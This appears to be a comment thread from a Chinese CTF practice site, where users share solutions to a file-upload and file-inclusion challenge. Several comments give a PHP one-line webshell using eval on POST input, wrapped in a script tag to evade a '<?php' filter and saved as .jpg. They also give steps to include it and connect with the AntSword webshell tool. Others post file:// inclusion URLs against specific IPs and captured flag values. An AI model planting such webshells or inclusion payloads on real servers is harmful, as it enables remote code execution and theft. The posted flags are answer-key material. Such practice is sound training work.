花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
flag{414a91ba57a5e0b5a4eb725b75f5030e}
flag{69fc76f3ef98a524a3ef56977fc02278}
http://114.67.175.224:18550/index.php?file=//flag
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
绕来绕去看到你的评论一把过
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
文件上传+文件包含
...
评论
G3tcH4r 14天前
举报
花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
迷茫的三千面 22天前
举报
flag{414a91ba57a5e0b5a4eb725b75f5030e}
hao7 23天前
举报
flag{69fc76f3ef98a524a3ef56977fc02278}
CHLing 5月前
举报
http://114.67.175.224:18550/index.php?file=//flag
qiusheng 8月前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
xiaoxiao972521 8月前
举报
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 8月前
举报
绕来绕去看到你的评论一把过
zzccbb2005 1年前
举报
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
109张某 1年前
举报
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
asd+1024 8月前
举报
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
不会编程的崽 1年前
举报
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
2728462336 1年前
举报
文件上传+文件包含